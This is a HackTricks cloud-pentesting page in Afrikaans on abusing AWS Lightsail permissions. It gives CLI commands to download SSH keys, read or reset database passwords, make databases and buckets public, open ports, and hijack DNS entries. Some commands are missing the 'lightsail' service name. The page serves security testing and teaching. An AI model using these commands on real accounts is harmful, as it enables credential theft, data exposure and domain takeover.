AWS - Lightsail Privesc

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Lightsail

Vir meer inligting oor Lightsail kyk:

AWS - Lightsail Enum

Dit is belangrik om te noem dat Lightsail nie IAM rolle wat aan die gebruiker behoort gebruik nie maar aan 'n AWS bestuurde rekening, so jy kan nie hierdie diens misbruik om privesc te doen nie. Tog, sensitiewe data soos kode, API sleutels en databasis inligting kan in hierdie diens gevind word.

`lightsail:DownloadDefaultKeyPair`

Hierdie toestemming sal jou toelaat om die SSH sleutels te verkry om toegang tot die instansies te kry:

aws lightsail download-default-key-pair

Potensiële Impak: Vind sensitiewe inligting binne die instansies.

`lightsail:GetInstanceAccessDetails`

Hierdie toestemming sal jou toelaat om SSH-sleutels te genereer om toegang tot die instansies te verkry:

aws lightsail get-instance-access-details --instance-name <instance_name>

Potensiële Impak: Vind sensitiewe inligting binne die instansies.

`lightsail:CreateBucketAccessKey`

Hierdie toestemming sal jou toelaat om 'n sleutel te verkry om toegang tot die emmer te verkry:

aws lightsail create-bucket-access-key --bucket-name <name>

Potensiële Impak: Vind sensitiewe inligting binne die emmer.

`lightsail:GetRelationalDatabaseMasterUserPassword`

Hierdie toestemming sal jou toelaat om die geloofsbriewe te verkry om toegang tot die databasis te verkry:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

Potensiële Impak: Vind sensitiewe inligting binne die databasis.

`lightsail:UpdateRelationalDatabase`

Hierdie toestemming sal jou toelaat om die wagwoord te verander om toegang tot die databasis te verkry:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

As die databasis nie publiek is nie, kan jy dit ook publiek maak met hierdie toestemmings met

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

Potensiële Impak: Vind sensitiewe inligting binne die databasis.

`lightsail:OpenInstancePublicPorts`

Hierdie toestemming laat toe om poorte na die Internet te open.

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

Potensiële Impak: Toegang tot sensitiewe poorte.

`lightsail:PutInstancePublicPorts`

Hierdie toestemming laat toe om poorte na die Internet te open. Let daarop dat die oproep enige poort wat nie daarop gespesifiseer is nie, sal sluit.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

Potensiële Impak: Toegang tot sensitiewe poorte.

`lightsail:SetResourceAccessForBucket`

Hierdie toestemming laat toe om 'n instansie toegang tot 'n emmer te gee sonder enige ekstra akrediteerbare.

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

Potensiële Impak: Potensiële nuwe toegang tot emmers met sensitiewe inligting.

`lightsail:UpdateBucket`

Met hierdie toestemming kan 'n aanvaller sy eie AWS-rekening leestoegang oor emmers verleen of selfs die emmers publiek maak vir almal:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

Potensiële Impak: Potensiële nuwe toegang tot emmers met sensitiewe inligting.

`lightsail:UpdateContainerService`

Met hierdie toestemmings kan 'n aanvaller toegang tot privaat ECR's van die houerdiens verleen.

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

Potensiële Impak: Kry sensitiewe inligting van private ECR

`lightsail:CreateDomainEntry`

'n Aanvaller met hierdie toestemming kan 'n subdomein skep en dit na sy eie IP-adres wys (subdomein oorneem), of 'n SPF-record opstel wat hom toelaat om e-posse van die domein te vervals, of selfs die hoofdomein na sy eie IP-adres stel.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Potensiële Impak: Neem 'n domein oor

`lightsail:UpdateDomainEntry`

'n Aanvaller met hierdie toestemming kan 'n subdomein skep en dit na sy eie IP-adres wys (subdomein oorname), of 'n SPF-record opstel wat hom toelaat om e-posse van die domein te vervals, of selfs die hoofdomein na sy eie IP-adres stel.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Potensiële Impak: Neem 'n domein oor

Leer & oefen AWS Hacking:HackTricks Opleiding AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Opleiding GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

PreviousAWS - Lambda Privesc NextAWS - Mediapackage Privesc

Last updated 9 days ago